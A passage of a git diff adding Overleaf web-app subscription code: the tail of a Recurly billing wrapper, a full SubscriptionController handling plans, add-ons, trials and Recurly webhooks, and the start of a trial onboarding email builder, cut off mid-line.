OError.tag(error, 'error building xml', { subscriptionId }) + } + + const { body } = await RecurlyWrapper.promises.apiRequest({ + url: `subscriptions/${subscriptionId}`, + method: 'PUT', + body: requestBody, + }) + return await RecurlyWrapper.promises._parseSubscriptionXml(body) + }, + + async createFixedAmountCoupon( + couponCode, + name, + currencyCode, + discountInCents, + planCode + ) { + const data = { + coupon_code: couponCode, + name, + discount_type: 'dollars', + discount_in_cents: {}, + plan_codes: { + plan_code: planCode, + }, + applies_to_all_plans: false, + } + data.discount_in_cents[currencyCode] = discountInCents + let requestBody + try { + requestBody = RecurlyWrapper._buildXml('coupon', data) + } catch (error) { + throw OError.tag(error, 'error building xml', { + couponCode, + name, + }) + } + + logger.debug({ couponCode, requestBody }, 'creating coupon') + try { + await RecurlyWrapper.promises.apiRequest({ + url: 'coupons', + method: 'POST', + body: requestBody, + }) + } catch (error) { + logger.warn({ err: error, couponCode }, 'error creating coupon') + throw error + } + }, + + async lookupCoupon(couponCode) { + const { body } = await RecurlyWrapper.promises.apiRequest({ + url: `coupons/${couponCode}`, + }) + return await RecurlyWrapper.promises._parseCouponXml(body) + }, + + async redeemCoupon(accountCode, couponCode) { + const data = { + account_code: accountCode, + currency: 'USD', + } + let requestBody + try { + requestBody = RecurlyWrapper._buildXml('redemption', data) + } catch (error) { + throw OError.tag(error, 'error building xml', { + accountCode, + couponCode, + }) + } + + logger.debug( + { accountCode, couponCode, requestBody }, + 'redeeming coupon for user' + ) + try { + await RecurlyWrapper.promises.apiRequest({ + url: `coupons/${couponCode}/redeem`, + method: 'POST', + body: requestBody, + }) + } catch (error) { + logger.warn( + { err: error, accountCode, couponCode }, + 'error redeeming coupon' + ) + throw error + } + }, + + async extendTrial(subscriptionId, daysUntilExpire) { + if (daysUntilExpire == null) { + daysUntilExpire = 7 + } + const nextRenewalDate = new Date() + nextRenewalDate.setDate(nextRenewalDate.getDate() + daysUntilExpire) + logger.debug( + { subscriptionId, daysUntilExpire }, + 'Exending Free trial for user' + ) + try { + await RecurlyWrapper.promises.apiRequest({ + url: `subscriptions/${subscriptionId}/postpone`, + qs: { bulk: false, next_bill_date: nextRenewalDate }, + method: 'PUT', + }) + } catch (error) { + logger.warn( + { err: error, subscriptionId, daysUntilExpire }, + 'error extending trial' + ) + throw error + } + }, + + async listAccountActiveSubscriptions(accountId) { + const { response, body } = await RecurlyWrapper.promises.apiRequest({ + url: `accounts/${accountId}/subscriptions`, + qs: { + state: 'active', + }, + expect404: true, + }) + if (response.status === 404) { + return [] + } else { + return await RecurlyWrapper.promises._parseSubscriptionsXml(body) + } + }, + + async _handle422Response(body) { + const data = await RecurlyWrapper.promises._parseErrorsXml(body) + let errorData = {} + if (data.transaction_error) { + errorData = { + message: data.transaction_error.merchant_message, + info: { + category: data.transaction_error.error_category, + gatewayCode: data.transaction_error.gateway_error_code, + public: { + code: data.transaction_error.error_code, + message: data.transaction_error.customer_message, + }, + }, + } + if (data.transaction_error.three_d_secure_action_token_id) { + errorData.info.public.threeDSecureActionTokenId = + data.transaction_error.three_d_secure_action_token_id + } + } else if (data.error && data.error._) { + // fallback for errors that don't have a `transaction_error` field, but + // instead a `error` field with a message (e.g. VATMOSS errors) + errorData = { + info: { + public: { + message: data.error._, + }, + }, + } + } + throw new SubscriptionErrors.RecurlyTransactionError(errorData) + }, + + async _parseSubscriptionsXml(xml) { + return await RecurlyWrapper.promises._parseXmlAndGetAttribute( + xml, + 'subscriptions' + ) + }, + async _parseSubscriptionXml(xml) { + return await RecurlyWrapper.promises._parseXmlAndGetAttribute( + xml, + 'subscription' + ) + }, + async _parseAccountXml(xml) { + return await RecurlyWrapper.promises._parseXmlAndGetAttribute( + xml, + 'account' + ) + }, + async _parseBillingInfoXml(xml) { + return await RecurlyWrapper.promises._parseXmlAndGetAttribute( + xml, + 'billing_info' + ) + }, + async _parseRedemptionsXml(xml) { + return await RecurlyWrapper.promises._parseXmlAndGetAttribute( + xml, + 'redemptions' + ) + }, + async _parseCouponXml(xml) { + return await RecurlyWrapper.promises._parseXmlAndGetAttribute(xml, 'coupon') + }, + async _parseErrorsXml(xml) { + return await RecurlyWrapper.promises._parseXmlAndGetAttribute(xml, 'errors') + }, + async _parseInvoicesXml(xml) { + return await RecurlyWrapper.promises._parseXmlAndGetAttribute( + xml, + 'invoices' + ) + }, + + async _parseXmlAndGetAttribute(xml, attribute) { + const data = await RecurlyWrapper.promises._parseXml(xml) + if (data && data[attribute] != null) { + return data[attribute] + } else { + throw new Error("I don't understand the response from Recurly") + } + }, + + /** + * @param xml + */ + _parseXml(xml) { + function convertDataTypes(data) { + let key, value + if (data && data.$) { + if (data.$.nil === 'nil') { + data = null + } else if (data.$.href) { + data.url = data.$.href + delete data.$ + } else if (data.$.type === 'integer') { + data = parseInt(data._, 10) + } else if (data.$.type === 'datetime') { + data = new Date(data._) + } else if (data.$.type === 'array') { + delete data.$ + let array = [] + for (key in data) { + value = data[key] + if (value instanceof Array) { + array = array.concat(convertDataTypes(value)) + } else { + array.push(convertDataTypes(value)) + } + } + data = array + } + } + + if (data instanceof Array) { + data = data.map(entry => convertDataTypes(entry)) + } else if (typeof data === 'object') { + for (key in data) { + value = data[key] + data[key] = convertDataTypes(value) + } + } + return data + } + + const parser = new xml2js.Parser({ + explicitRoot: true, + explicitArray: false, + emptyTag: '', + }) + return new Promise((resolve, reject) => + parser.parseString(xml, function (error, data) { + if (error) { + return reject(error) + } + const result = convertDataTypes(data) + resolve(result) + }) + ) + }, +} + +function _buildXml(rootName, data) { + const options = { + headless: true, + renderOpts: { + pretty: true, + indent: '\t', + }, + rootName, + } + const builder = new xml2js.Builder(options) + return builder.buildObject(data) +} + +const RecurlyWrapper = { + apiUrl: Settings.apis.recurly.url || 'https://api.recurly.com/v2', + _buildXml, + _parseXml: callbackify(promises._parseXml), + createFixedAmountCoupon: callbackify(promises.createFixedAmountCoupon), + getBillingInfo: callbackify(promises.getBillingInfo), + getPaginatedEndpoint: callbackify(promises.getPaginatedEndpoint), + getSubscription: callbackify(promises.getSubscription), + getSubscriptions: callbackify(promises.getSubscriptions), + updateAccountEmailAddress: callbackify(promises.updateAccountEmailAddress), +} + +RecurlyWrapper.promises = { + ...promises, + updateAccountEmailAddress, +} + +module.exports = RecurlyWrapper + +function getCustomFieldsFromSubscriptionDetails(subscriptionDetails) { + if (!subscriptionDetails.ITMCampaign) { + return null + } + + const customFields = [ + { + name: 'itm_campaign', + value: subscriptionDetails.ITMCampaign, + }, + ] + if (subscriptionDetails.ITMContent) { + customFields.push({ + name: 'itm_content', + value: subscriptionDetails.ITMContent, + }) + } + if (subscriptionDetails.ITMReferrer) { + customFields.push({ + name: 'itm_referrer', + value: subscriptionDetails.ITMReferrer, + }) + } + return { custom_field: customFields } +} + +function getAddressFromSubscriptionDetails( + subscriptionDetails, + includeCompanyInfo +) { + const { address } = subscriptionDetails + + if (!address || !address.country) { + throw new Errors.InvalidError({ + message: 'Invalid country', + info: { + public: { + message: 'Invalid country', + }, + }, + }) + } + + const addressObject = { + address1: address.address1, + address2: address.address2 || '', + city: address.city || '', + state: address.state || '', + zip: address.zip || '', + country: address.country, + } + + if ( + includeCompanyInfo && + subscriptionDetails.billing_info && + subscriptionDetails.billing_info.company && + subscriptionDetails.billing_info.company !== '' + ) { + addressObject.company = subscriptionDetails.billing_info.company + if ( + subscriptionDetails.billing_info.vat_number && + subscriptionDetails.billing_info.vat_number !== '' + ) { + addressObject.vat_number = subscriptionDetails.billing_info.vat_number + } + } + + return addressObject +} diff --git a/services/web/app/src/Features/Subscription/SubscriptionController.js b/services/web/app/src/Features/Subscription/SubscriptionController.js new file mode 100644 index 0000000..838b580 --- /dev/null +++ b/services/web/app/src/Features/Subscription/SubscriptionController.js @@ -0,0 +1,804 @@ +// @ts-check + +const SessionManager = require('../Authentication/SessionManager') +const SubscriptionHandler = require('./SubscriptionHandler') +const SubscriptionViewModelBuilder = require('./SubscriptionViewModelBuilder') +const LimitationsManager = require('./LimitationsManager') +const RecurlyWrapper = require('./RecurlyWrapper') +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const GeoIpLookup = require('../../infrastructure/GeoIpLookup') +const FeaturesUpdater = require('./FeaturesUpdater') +const GroupPlansData = require('./GroupPlansData') +const V1SubscriptionManager = require('./V1SubscriptionManager') +const AnalyticsManager = require('../Analytics/AnalyticsManager') +const RecurlyEventHandler = require('./RecurlyEventHandler') +const { expressify } = require('@overleaf/promise-utils') +const OError = require('@overleaf/o-error') +const { DuplicateAddOnError, AddOnNotPresentError } = require('./Errors') +const SplitTestHandler = require('../SplitTests/SplitTestHandler') +const AuthorizationManager = require('../Authorization/AuthorizationManager') +const Modules = require('../../infrastructure/Modules') +const async = require('async') +const HttpErrorHandler = require('../Errors/HttpErrorHandler') +const RecurlyClient = require('./RecurlyClient') +const { AI_ADD_ON_CODE } = require('./PaymentProviderEntities') +const PlansLocator = require('./PlansLocator') +const PaymentProviderEntities = require('./PaymentProviderEntities') + +/** + * @import { SubscriptionChangeDescription } from '../../../../types/subscription/subscription-change-preview' + * @import { SubscriptionChangePreview } from '../../../../types/subscription/subscription-change-preview' + * @import { PaymentProviderSubscriptionChange } from './PaymentProviderEntities' + * @import { PaymentMethod } from './types' + */ + +const groupPlanModalOptions = Settings.groupPlanModalOptions + +function formatGroupPlansDataForDash() { + return { + plans: [...groupPlanModalOptions.plan_codes], + sizes: [...groupPlanModalOptions.sizes], + usages: [...groupPlanModalOptions.usages], + priceByUsageTypeAndSize: JSON.parse(JSON.stringify(GroupPlansData)), + } +} + +async function userSubscriptionPage(req, res) { + const user = SessionManager.getSessionUser(req.session) + await SplitTestHandler.promises.getAssignment(req, res, 'pause-subscription') + + const groupPricingDiscount = await SplitTestHandler.promises.getAssignment( + req, + res, + 'group-discount-10' + ) + + const showGroupDiscount = groupPricingDiscount.variant === 'enabled' + + const results = + await SubscriptionViewModelBuilder.promises.buildUsersSubscriptionViewModel( + user, + req.i18n.language + ) + const { + personalSubscription, + memberGroupSubscriptions, + managedGroupSubscriptions, + currentInstitutionsWithLicence, + managedInstitutions, + managedPublishers, + } = results + const { hasSubscription } = + await LimitationsManager.promises.userHasSubscription(user) + + const userCanExtendTrial = ( + await Modules.promises.hooks.fire('userCanExtendTrial', user) + )?.[0] + const fromPlansPage = req.query.hasSubscription + const plansData = + SubscriptionViewModelBuilder.buildPlansListForSubscriptionDash( + personalSubscription?.plan + ) + + AnalyticsManager.recordEventForSession(req.session, 'subscription-page-view') + + const groupPlansDataForDash = formatGroupPlansDataForDash() + + // display the Group Settings button only to admins of group subscriptions with either/or the Managed Users or Group SSO feature available + let groupSettingsEnabledFor + try { + const managedGroups = await async.filter( + managedGroupSubscriptions || [], + async subscription => { + const managedUsersResults = await Modules.promises.hooks.fire( + 'hasManagedUsersFeature', + subscription + ) + const groupSSOResults = await Modules.promises.hooks.fire( + 'hasGroupSSOFeature', + subscription + ) + const isGroupAdmin = + (subscription.admin_id._id || subscription.admin_id).toString() === + user._id.toString() + return ( + (managedUsersResults?.[0] === true || + groupSSOResults?.[0] === true) && + isGroupAdmin + ) + } + ) + groupSettingsEnabledFor = managedGroups.map(subscription => + subscription._id.toString() + ) + } catch (error) { + logger.error( + { err: error }, + 'Failed to list groups with group settings enabled' + ) + } + + let groupSettingsAdvertisedFor + try { + const managedGroups = await async.filter( + managedGroupSubscriptions || [], + async subscription => { + const managedUsersResults = await Modules.promises.hooks.fire( + 'hasManagedUsersFeatureOnNonProfessionalPlan', + subscription + ) + const groupSSOResults = await Modules.promises.hooks.fire( + 'hasGroupSSOFeatureOnNonProfessionalPlan', + subscription + ) + const isGroupAdmin = + (subscription.admin_id._id || subscription.admin_id).toString() === + user._id.toString() + const plan = PlansLocator.findLocalPlanInSettings(subscription.planCode) + return ( + (managedUsersResults?.[0] === true || + groupSSOResults?.[0] === true) && + isGroupAdmin && + plan?.canUseFlexibleLicensing + ) + } + ) + groupSettingsAdvertisedFor = managedGroups.map(subscription => + subscription._id.toString() + ) + } catch (error) { + logger.error( + { err: error }, + 'Failed to list groups with group settings enabled for advertising' + ) + } + + const hasAiAssistViaWritefull = + await FeaturesUpdater.promises.hasFeaturesViaWritefull(user._id) + + const data = { + title: 'your_subscription', + plans: plansData?.plans, + planCodesChangingAtTermEnd: plansData?.planCodesChangingAtTermEnd, + user, + hasSubscription, + fromPlansPage, + personalSubscription, + userCanExtendTrial, + memberGroupSubscriptions, + managedGroupSubscriptions, + managedInstitutions, + managedPublishers, + showGroupDiscount, + currentInstitutionsWithLicence, + canUseFlexibleLicensing: + personalSubscription?.plan?.canUseFlexibleLicensing, + groupPlans: groupPlansDataForDash, + groupSettingsAdvertisedFor, + groupSettingsEnabledFor, + isManagedAccount: !!req.managedBy, + userRestrictions: Array.from(req.userRestrictions || []), + hasAiAssistViaWritefull, + } + res.render('subscriptions/dashboard-react', data) +} + +async function successfulSubscription(req, res) { + const user = SessionManager.getSessionUser(req.session) + + const { personalSubscription } = + await SubscriptionViewModelBuilder.promises.buildUsersSubscriptionViewModel( + user, + req.i18n.language + ) + + const postCheckoutRedirect = req.session?.postCheckoutRedirect + + if (!personalSubscription) { + res.redirect('/user/subscription/plans') + } else { + res.render('subscriptions/successful-subscription-react', { + title: 'thank_you', + personalSubscription, + postCheckoutRedirect, + user, + }) + } +} + +async function pauseSubscription(req, res, next) { + const user = SessionManager.getSessionUser(req.session) + const pauseCycles = req.params.pauseCycles + if (!('pauseCycles' in req.params)) { + return HttpErrorHandler.badRequest( + req, + res, + `Pausing subscription requires a 'pauseCycles' argument with number of billing cycles to pause for` + ) + } + if (pauseCycles < 0) { + return HttpErrorHandler.badRequest( + req, + res, + `'pauseCycles' should be a number of billing cycles to pause for, or 0 to cancel a pending pause` + ) + } + logger.debug( + { userId: user._id }, + `pausing subscription for ${pauseCycles} billing cycles` + ) + try { + await SubscriptionHandler.promises.pauseSubscription(user, pauseCycles) + + const { subscription } = + await LimitationsManager.promises.userHasSubscription(user) + + AnalyticsManager.recordEventForUserInBackground( + user._id, + 'subscription-pause-scheduled', + { + pause_length: pauseCycles, + plan_code: subscription?.planCode, + subscriptionId: subscription?.recurlySubscription_id, + } + ) + + return res.sendStatus(200) + } catch (err) { + if (err instanceof Error) { + OError.tag(err, 'something went wrong pausing subscription', { + user_id: user._id, + }) + } + return next(err) + } +} + +async function resumeSubscription(req, res, next) { + const user = SessionManager.getSessionUser(req.session) + logger.debug({ userId: user._id }, `resuming subscription`) + try { + await SubscriptionHandler.promises.resumeSubscription(user) + return res.sendStatus(200) + } catch (err) { + if (err instanceof Error) { + OError.tag(err, 'something went wrong resuming subscription', { + user_id: user._id, + }) + } + return next(err) + } +} + +function cancelSubscription(req, res, next) { + const user = SessionManager.getSessionUser(req.session) + logger.debug({ userId: user._id }, 'canceling subscription') + SubscriptionHandler.cancelSubscription(user, function (err) { + if (err) { + OError.tag(err, 'something went wrong canceling subscription', { + user_id: user._id, + }) + return next(err) + } + // Note: this redirect isn't used in the main flow as the redirection is + // handled by Angular + res.redirect('/user/subscription/canceled') + }) +} + +/** + * @returns {Promise<void>} + */ +async function canceledSubscription(req, res, next) { + return res.render('subscriptions/canceled-subscription-react', { + title: 'subscription_canceled', + user: SessionManager.getSessionUser(req.session), + }) +} + +function cancelV1Subscription(req, res, next) { + const userId = SessionManager.getLoggedInUserId(req.session) + logger.debug({ userId }, 'canceling v1 subscription') + V1SubscriptionManager.cancelV1Subscription(userId, function (err) { + if (err) { + OError.tag(err, 'something went wrong canceling v1 subscription', { + userId, + }) + return next(err) + } + res.redirect('/user/subscription') + }) +} + +async function previewAddonPurchase(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + const addOnCode = req.params.addOnCode + + if (addOnCode !== AI_ADD_ON_CODE) { + return HttpErrorHandler.notFound(req, res, `Unknown add-on: ${addOnCode}`) + } + + const paymentMethod = await RecurlyClient.promises.getPaymentMethod(userId) + + let subscriptionChange + try { + subscriptionChange = + await SubscriptionHandler.promises.previewAddonPurchase(userId, addOnCode) + + const hasAiAssistViaWritefull = + await FeaturesUpdater.promises.hasFeaturesViaWritefull(userId) + const isAiUpgrade = + PaymentProviderEntities.subscriptionChangeIsAiAssistUpgrade( + subscriptionChange + ) + if (hasAiAssistViaWritefull && isAiUpgrade) { + return res.redirect( + '/user/subscription?redirect-reason=writefull-entitled' + ) + } + } catch (err) { + if (err instanceof DuplicateAddOnError) { + return res.redirect('/user/subscription?redirect-reason=double-buy') + } + throw err + } + + const subscription = subscriptionChange.subscription + const addOn = await RecurlyClient.promises.getAddOn( + subscription.planCode, + addOnCode + ) + + /** @type {SubscriptionChangePreview} */ + const changePreview = makeChangePreview( + { + type: 'add-on-purchase', + addOn: { + code: addOn.code, + name: addOn.name, + }, + }, + subscriptionChange, + paymentMethod + ) + + res.render('subscriptions/preview-change', { changePreview }) +} + +async function purchaseAddon(req, res, next) { + const user = SessionManager.getSessionUser(req.session) + const addOnCode = req.params.addOnCode + // currently we only support having a quantity of 1 + const quantity = 1 + // currently we only support one add-on, the Ai add-on + if (addOnCode !== AI_ADD_ON_CODE) { + return res.sendStatus(404) + } + + logger.debug({ userId: user._id, addOnCode }, 'purchasing add-ons') + try { + await SubscriptionHandler.promises.purchaseAddon( + user._id, + addOnCode, + quantity + ) + return res.sendStatus(200) + } catch (err) { + if (err instanceof DuplicateAddOnError) { + HttpErrorHandler.badRequest( + req, + res, + 'Your subscription already includes this add-on', + { addon: addOnCode } + ) + } else { + if (err instanceof Error) { + OError.tag(err, 'something went wrong purchasing add-ons', { + user_id: user._id, + addOnCode, + }) + } + return next(err) + } + } +} + +async function removeAddon(req, res, next) { + const user = SessionManager.getSessionUser(req.session) + const addOnCode = req.params.addOnCode + + if (addOnCode !== AI_ADD_ON_CODE) { + return res.sendStatus(404) + } + + logger.debug({ userId: user._id, addOnCode }, 'removing add-ons') + + try { + await SubscriptionHandler.promises.removeAddon(user._id, addOnCode) + res.sendStatus(200) + } catch (err) { + if (err instanceof AddOnNotPresentError) { + HttpErrorHandler.badRequest( + req, + res, + 'Your subscription does not contain the requested add-on', + { addon: addOnCode } + ) + } else { + if (err instanceof Error) { + OError.tag(err, 'something went wrong removing add-ons', { + user_id: user._id, + addOnCode, + }) + } + return next(err) + } + } +} + +async function previewSubscription(req, res, next) { + const planCode = req.query.planCode + if (!planCode) { + return HttpErrorHandler.notFound(req, res, 'Missing plan code') + } + const plan = await RecurlyClient.promises.getPlan(planCode) + const userId = SessionManager.getLoggedInUserId(req.session) + const subscriptionChange = + await SubscriptionHandler.promises.previewSubscriptionChange( + userId, + planCode + ) + const paymentMethod = await RecurlyClient.promises.getPaymentMethod(userId) + const changePreview = makeChangePreview( + { + type: 'premium-subscription', + plan: { code: plan.code, name: plan.name }, + }, + subscriptionChange, + paymentMethod + ) + + res.render('subscriptions/preview-change', { changePreview }) +} + +function cancelPendingSubscriptionChange(req, res, next) { + const user = SessionManager.getSessionUser(req.session) + logger.debug({ userId: user._id }, 'canceling pending subscription change') + SubscriptionHandler.cancelPendingSubscriptionChange(user, function (err) { + if (err) { + OError.tag( + err, + 'something went wrong canceling pending subscription change', + { + user_id: user._id, + } + ) + return next(err) + } + res.redirect('/user/subscription') + }) +} + +function updateAccountEmailAddress(req, res, next) { + const user = SessionManager.getSessionUser(req.session) + RecurlyWrapper.updateAccountEmailAddress( + user._id, + user.email, + function (error) { + if (error) { + return next(error) + } + res.sendStatus(200) + } + ) +} + +function reactivateSubscription(req, res, next) { + const user = SessionManager.getSessionUser(req.session) + logger.debug({ userId: user._id }, 'reactivating subscription') + try { + if (req.isManagedGroupAdmin) { + // allow admins to reactivate subscriptions + } else { + // otherwise require the user to have the reactivate-subscription permission + req.assertPermission('reactivate-subscription') + } + } catch (error) { + return next(error) + } + SubscriptionHandler.reactivateSubscription(user, function (err) { + if (err) { + OError.tag(err, 'something went wrong reactivating subscription', { + user_id: user._id, + }) + return next(err) + } + res.redirect('/user/subscription') + }) +} + +function recurlyCallback(req, res, next) { + logger.debug({ data: req.body }, 'received recurly callback') + const event = Object.keys(req.body)[0] + const eventData = req.body[event] + + RecurlyEventHandler.sendRecurlyAnalyticsEvent(event, eventData).catch(error => + logger.error( + { err: error }, + 'Failed to process analytics event on Recurly webhook' + ) + ) + + if ( + [ + 'new_subscription_notification', + 'updated_subscription_notification', + 'expired_subscription_notification', + 'subscription_paused_notification', + 'subscription_resumed_notification', + ].includes(event) + ) { + const recurlySubscription = eventData.subscription + SubscriptionHandler.syncSubscription( + recurlySubscription, + { ip: req.ip }, + function (err) { + if (err) { + return next(err) + } + res.sendStatus(200) + } + ) + } else if (event === 'billing_info_updated_notification') { + const recurlyAccountCode = eventData.account.account_code + SubscriptionHandler.attemptPaypalInvoiceCollection( + recurlyAccountCode, + function (err) { + if (err) { + return next(err) + } + res.sendStatus(200) + } + ) + } else { + res.sendStatus(200) + } +} + +async function extendTrial(req, res) { + const user = SessionManager.getSessionUser(req.session) + const { subscription } = + await LimitationsManager.promises.userHasSubscription(user) + + const allowed = ( + await Modules.promises.hooks.fire('userCanExtendTrial', user) + )?.[0] + if (!allowed) { + logger.warn({ userId: user._id }, 'user can not extend trial') + return res.sendStatus(403) + } + + try { + await SubscriptionHandler.promises.extendTrial(subscription, 14) + AnalyticsManager.recordEventForSession( + req.session, + 'subscription-trial-extended' + ) + } catch (error) { + return res.sendStatus(500) + } + res.sendStatus(200) +} + +function recurlyNotificationParser(req, res, next) { + let xml = '' + req.on('data', chunk => (xml += chunk)) + req.on('end', () => + RecurlyWrapper._parseXml(xml, function (error, body) { + if (error) { + return next(error) + } + req.body = body + next() + }) + ) +} + +async function refreshUserFeatures(req, res) { + const { user_id: userId } = req.params + await FeaturesUpdater.promises.refreshFeatures(userId, 'acceptance-test') + res.sendStatus(200) +} + +async function redirectToHostedPage(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + const { pageType } = req.params + const url = + await SubscriptionViewModelBuilder.promises.getRedirectToHostedPage( + userId, + pageType + ) + logger.warn({ userId, pageType }, 'redirecting to recurly hosted page') + res.redirect(url) +} + +async function getRecommendedCurrency(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + let ip = req.ip + if ( + req.query?.ip && + (await AuthorizationManager.promises.isUserSiteAdmin(userId)) + ) { + ip = req.query.ip + } + const currencyLookup = await GeoIpLookup.promises.getCurrencyCode(ip) + let countryCode = currencyLookup.countryCode + const recommendedCurrency = currencyLookup.currencyCode + + let currency = null + const queryCurrency = req.query.currency?.toUpperCase() + if (queryCurrency && GeoIpLookup.isValidCurrencyParam(queryCurrency)) { + currency = queryCurrency + } else if (recommendedCurrency) { + currency = recommendedCurrency + } + + const queryCountryCode = req.query.countryCode?.toUpperCase() + + // only enable countryCode testing flag on staging or dev environments + if (queryCountryCode && process.env.NODE_ENV !== 'production') { + countryCode = queryCountryCode + } + + return { + currency, + recommendedCurrency, + countryCode, + } +} + +async function getLatamCountryBannerDetails(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + let ip = req.ip + if ( + req.query?.ip && + (await AuthorizationManager.promises.isUserSiteAdmin(userId)) + ) { + ip = req.query.ip + } + const currencyLookup = await GeoIpLookup.promises.getCurrencyCode(ip) + const countryCode = currencyLookup.countryCode + const latamCountryBannerDetails = {} + + switch (countryCode) { + case `MX`: + latamCountryBannerDetails.latamCountryFlag = '🇲🇽' + latamCountryBannerDetails.country = 'Mexico' + latamCountryBannerDetails.discount = '25%' + latamCountryBannerDetails.currency = 'Mexican Pesos' + break + case `CO`: + latamCountryBannerDetails.latamCountryFlag = '🇨🇴' + latamCountryBannerDetails.country = 'Colombia' + latamCountryBannerDetails.discount = '60%' + latamCountryBannerDetails.currency = 'Colombian Pesos' + break + case `CL`: + latamCountryBannerDetails.latamCountryFlag = '🇨🇱' + latamCountryBannerDetails.country = 'Chile' + latamCountryBannerDetails.discount = '30%' + latamCountryBannerDetails.currency = 'Chilean Pesos' + break + case `PE`: + latamCountryBannerDetails.latamCountryFlag = '🇵🇪' + latamCountryBannerDetails.country = 'Peru' + latamCountryBannerDetails.currency = 'Peruvian Soles' + latamCountryBannerDetails.discount = '40%' + break + } + + return latamCountryBannerDetails +} + +/** + * There are two sets of group plans: legacy plans and consolidated plans, + * and their naming conventions differ. + * This helper method computes the name of legacy group plans to ensure + * consistency with the naming of consolidated group plans. + * + * @param {string} planName + * @param {string} planCode + * @return {string} + */ + +function getPlanNameForDisplay(planName, planCode) { + const match = planCode.match( + /^group_(collaborator|professional)_\d+_(enterprise|educational)$/ + ) + + if (!match) return planName + + const [, type, category] = match + const prefix = type === 'collaborator' ? 'Standard' : 'Professional' + const suffix = category === 'educational' ? ' Educational' : '' + + return `Overleaf ${prefix} Group${suffix}` +} + +/** + * Build a subscription change preview for display purposes + * + * @param {SubscriptionChangeDescription} subscriptionChangeDescription A description of the change for the frontend + * @param {PaymentProviderSubscriptionChange} subscriptionChange The subscription change object coming from Recurly + * @param {PaymentMethod} paymentMethod The payment method associated to the user + * @return {SubscriptionChangePreview} + */ +function makeChangePreview( + subscriptionChangeDescription, + subscriptionChange, + paymentMethod +) { + const subscription = subscriptionChange.subscription + const nextPlan = PlansLocator.findLocalPlanInSettings( + subscriptionChange.nextPlanCode + ) + return { + change: subscriptionChangeDescription, + currency: subscription.currency, + immediateCharge: { ...subscriptionChange.immediateCharge }, + paymentMethod: paymentMethod.toString(), + nextPlan: { + annual: nextPlan.annual ?? false, + }, + nextInvoice: { + date: subscription.periodEnd.toISOString(), + plan: { + name: getPlanNameForDisplay( + subscriptionChange.nextPlanName, + subscriptionChange.nextPlanCode + ), + amount: subscriptionChange.nextPlanPrice, + }, + addOns: subscriptionChange.nextAddOns.map(addOn => ({ + code: addOn.code, + name: addOn.name, + quantity: addOn.quantity, + unitAmount: addOn.unitPrice, + amount: addOn.preTaxTotal, + })), + subtotal: subscriptionChange.subtotal, + tax: { + rate: subscription.taxRate, + amount: subscriptionChange.tax, + }, + total: subscriptionChange.total, + }, + } +} + +module.exports = { + userSubscriptionPage: expressify(userSubscriptionPage), + successfulSubscription: expressify(successfulSubscription), + cancelSubscription, + pauseSubscription, + resumeSubscription, + canceledSubscription: expressify(canceledSubscription), + cancelV1Subscription, + previewSubscription: expressify(previewSubscription), + cancelPendingSubscriptionChange, + updateAccountEmailAddress, + reactivateSubscription, + recurlyCallback, + extendTrial: expressify(extendTrial), + recurlyNotificationParser, + refreshUserFeatures: expressify(refreshUserFeatures), + redirectToHostedPage: expressify(redirectToHostedPage), + previewAddonPurchase: expressify(previewAddonPurchase), + purchaseAddon, + removeAddon, + makeChangePreview, + getRecommendedCurrency, + getLatamCountryBannerDetails, + getPlanNameForDisplay, +} diff --git a/services/web/app/src/Features/Subscription/SubscriptionEmailBuilder.js b/services/web/app/src/Features/Subscription/SubscriptionEmailBuilder.js new file mode 100644 index 0000000..bafdee4 --- /dev/null +++ b/services/web/app/src/Features/Subscription/SubscriptionEmailBuilder.js @@ -0,0 +1,165 @@ +const EmailBuilder = require('../Email/EmailBuilder') +const EmailMessageHelper = require('../Email/EmailMessageHelper') +const settings = require('@overleaf/settings') + +EmailBuilder.templates.trialOnboarding = EmailBuilder.NoCTAEmailTemplate({ + subject(opts) { + return `Welcome to your Overleaf ${opts.planName} plan trial` + }, + title(opts) { + return `Welcome to your Overleaf ${opts.planName} plan trial` + }, + greeting() { + return 'Hello,' + }, + message(opts, isPlainText) { + const invitingNamedCollaborators = EmailMessageHelper.displayLink( + 'Read More', + `${settings.siteUrl}/learn/how-to/Sharing_a_project?utm_source=Overleaf&utm_medium=email&utm_campaign=TrialEmail&utm_content=invitelink#Inviting_named_collaborators`, + isPlainText + ) + const increasedCompileTimeout = EmailMessageHelper.displayLink( + 'Read More', + `${settings.siteUrl}/learn/how-to/What_is_the_maximum_compilation_time,_file_number_and_project_size_allowed_on_free_vs_paid_plans%3F?utm_source=Overleaf&utm_medium=email&utm_campaign=TrialEmail&utm_content=compilelink`, + isPlainText + ) + const realTimeTrackChanges = EmailMessageHelper.displayLink( + 'Read More', + `${settings.siteUrl}/learn/how-to/Track_Changes_in_Overleaf?utm_source=Overleaf&utm_medium=email&utm_campaign=TrialEmail&utm_content=trackchangeslink`, + isPlainText + ) + const history = EmailMessageHelper.displayLink( + 'Read More', + `${settings.siteUrl}/learn/latex/Using_the_History_feature?utm_source=Overleaf&utm_medium=email&utm_campaign=TrialEmail&utm_content=historylink`, + isPlainText + ) + const versioning = EmailMessageHelper.displayLink( + 'Read More', + `${settings.siteUrl}/learn/how-to/Can_I_save_versions_of_my_work%3F?utm_source=Overleaf&utm_medium=email&utm_campaign=TrialEmail&utm_content=versioninglink`, + isPlainText + ) + const advancedReferenceSearch = EmailMessageHelper.displayLink( + 'Read More', + `${settings.siteUrl}/learn/how-to/How_to_search_for_references_in_an_Overleaf_project?utm_source=Overleaf&utm_medium=email&utm_campaign=TrialEmail&utm_content=adrefsearchlink`, + isPlainText + ) + const referenceManagerSync = EmailMessageHelper.displayLink( + 'Read More', + `${settings.siteUrl}/learn/how-to/How_to_link_your_Overleaf_account_to_Mendeley_and_Zotero?utm_source=Overleaf&utm_medium=email&utm_campaign=TrialEmail&utm_content=refmansynclink`, + isPlainText + ) + const dropboxSync = EmailMessageHelper.displayLink( + 'Read More', + `${settings.siteUrl}/learn/how-to/Dropbox_Synchronization?utm_source=Overleaf&utm_medium=email&utm_campaign=TrialEmail&utm_content=dropboxlink`, + isPlainText + ) + const gitSync = EmailMessageHelper.displayLink( + 'Read More', + `${settings.siteUrl}/learn/how-to/Using_Git_and_GitHub?utm_source=Overleaf&utm_medium=email&utm_campaign=TrialEmail&utm_content=gitgithublink`, + isPlainText + ) + const 